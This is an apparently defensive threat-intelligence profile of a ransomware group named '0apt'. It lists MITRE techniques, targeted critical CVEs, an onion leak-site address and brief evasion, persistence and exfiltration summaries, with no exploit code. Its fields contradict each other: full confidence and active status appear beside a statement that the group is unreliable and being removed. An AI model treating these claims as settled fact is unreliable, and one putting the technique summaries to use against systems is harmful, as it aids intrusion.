Threat Actor Profile
Low Cybercriminal
Description

The group appears unreliable. Most, if not all, of its alleged victims cannot be verified and appear to be randomly selected organizations. WE HAVE DECIDED TO REMOVE ENTRIES FOR THIS GROUP

Confidence Score
100%
Tags
ransomware ransomware.live
First Seen

Unknown

Last Updated

Unknown

Active Status
Active
Created

April 29, 2026

MITRE ATT&CK Techniques (6)
T1622 - Debugger Evasion
Defense Evasion
T1046 - Network Service Discovery
Discovery
T1106 - Native API
Execution
T1567.002 - Exfiltration to Cloud Storage
Exfiltration
T1190 - Exploit Public-Facing Application
Initial Access
T1543.002 - Systemd Service
Persistence
Indicators of Compromise

Loading IOCs…

IOC KQL for Sentinel
STIX Data 
{'added_date': '2026-01-28',
 'client': '2003264@sit.singaporetech.edu.sg',
 'description': 'The group appears unreliable. Most, if not all, of its '
                'alleged victims cannot be verified and appear to be randomly '
                'selected organizations. WE HAVE DECIDED TO REMOVE ENTRIES FOR '
                'THIS GROUP',
 'firstseen': None,
 'group': '0apt',
 'has_negotiations': False,
 'has_ransomnote': True,
 'lastseen': None,
 'locations': [{'available': True,
                'fqdn': 'oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                'slug': 'http://oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                'title': '404 - Compromised',
                'type': 'DLS'}],
 'negotiation_count': 0,
 'ransomnotes_count': 1,
 'tiaras_metadata': {'has_negotiations': False,
                     'has_ransomnote': True,
                     'locations': [{'available': True,
                                    'fqdn': 'oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                                    'slug': 'http://oaptxiyisljt2kv3we2we34kuudmqda7f2geffoylzpeo7ourhtz4dad.onion',
                                    'title': '404 - Compromised',
                                    'type': 'DLS'}],
                     'negotiation_count': 0,
                     'ransomnotes_count': 1,
                     'ransomware_live_group': '0apt',
                     'tools': {},
                     'url': 'https://www.ransomware.live/group/0apt',
                     'victims': 0,
                     'vulnerabilities': [{'CVE': 'CVE-2024-3400',
                                          'CVSS': 10.0,
                                          'Product': 'PAN-OS (Edge Firewalls)',
                                          'Vendor': 'Palo Alto Networks',
                                          'severity': 'CRITICAL'},
                                         {'CVE': 'CVE-2025-22457',
                                          'CVSS': 9.0,
                                          'Product': 'Ivanti ICS',
                                          'Vendor': 'Ivanti',
                                          'severity': 'CRITICAL'},
                                         {'CVE': 'CVE-2024-21887',
                                          'CVSS': 9.1,
                                          'Product': 'VPN Appliance',
                                          'Vendor': 'Ivanti',
                                          'severity': 'CRITICAL'},
                                         {'CVE': 'CVE-2025-61882',
                                          'CVSS': 9.8,
                                          'Product': 'Oracle E-Business Suite '
                                                     '(EBS)',
                                          'Vendor': 'Oracle',
                                          'severity': 'CRITICAL'}]},
 'tiaras_source': 'ransomware.live',
 'tools': {},
 'ttps': [{'tactic_id': 'TA0001',
           'tactic_name': 'Initial Access',
           'techniques': [{'technique_details': 'Exploitation of '
                                                'internet-facing applications '
                                                '(focus on firewalls and '
                                                'VPNs).',
                           'technique_id': 'T1190',
                           'technique_name': 'Exploit Public-Facing '
                                             'Application'}]},
          {'tactic_id': 'TA0002',
           'tactic_name': 'Execution',
           'techniques': [{'technique_details': 'Direct system calls to bypass '
                                                'EDRs based on API hooks.',
                           'technique_id': 'T1106',
                           'technique_name': 'Native API'}]},
          {'tactic_id': 'TA0003',
           'tactic_name': 'Persistence',
           'techniques': [{'technique_details': 'Creation of fake services on '
                                                'Linux systems (systemd).',
                           'technique_id': 'T1543.002',
                           'technique_name': 'Create or Modify System Process: '
                                             'Systemd Service'}]},
          {'tactic_id': 'TA0005',
           'tactic_name': 'Defense Evasion',
           'techniques': [{'technique_details': 'The 0apt payload contains '
                                                '"useless math" loops to delay '
                                                'sandbox analysis.',
                           'technique_id': 'T1622',
                           'technique_name': 'Debugger Evasion'}]},
          {'tactic_id': 'TA0007',
           'tactic_name': 'Discovery',
           'techniques': [{'technique_details': 'Use of custom tools that '
                                                'mimic legitimate monitoring '
                                                'traffic.',
                           'technique_id': 'T1046',
                           'technique_name': 'Network Service Scanning'}]},
          {'tactic_id': 'TA0010',
           'tactic_name': 'Exfiltration',
           'techniques': [{'technique_details': 'Sending data via HTTPS '
                                                'tunnels to legitimate AWS S3 '
                                                'instances.',
                           'technique_id': 'T1567.002',
                           'technique_name': 'Exfiltration Over Web Service: '
                                             'Exfiltration to Cloud '
                                             'Storage'}]}],
 'url': 'https://www.ransomware.live/group/0apt',
 'victims': 0,
 'vulnerabilities': [{'CVE': 'CVE-2024-3400',
                      'CVSS': 10.0,
                      'Product': 'PAN-OS (Edge Firewalls)',
                      'Vendor': 'Palo Alto Networks',
                      'severity': 'CRITICAL'},
                     {'CVE': 'CVE-2025-22457',
                      'CVSS': 9.0,
                      'Product': 'Ivanti ICS',
                      'Vendor': 'Ivanti',
                      'severity': 'CRITICAL'},
                     {'CVE': 'CVE-2024-21887',
                      'CVSS': 9.1,
                      'Product': 'VPN Appliance',
                      'Vendor': 'Ivanti',
                      'severity': 'CRITICAL'},
                     {'CVE': 'CVE-2025-61882',
                      'CVSS': 9.8,
                      'Product': 'Oracle E-Business Suite (EBS)',
                      'Vendor': 'Oracle',
                      'severity': 'CRITICAL'}]}
Quick Actions
Related TTPs (6)
Debugger Evasion
Defense Evasion
Network Service Discovery
Discovery
Native API
Execution
Exfiltration to Cloud Storage
Exfiltration
Exploit Public-Facing Applica…
Initial Access
View All 6 TTPs
Back to Threat Actors
Dashboard Home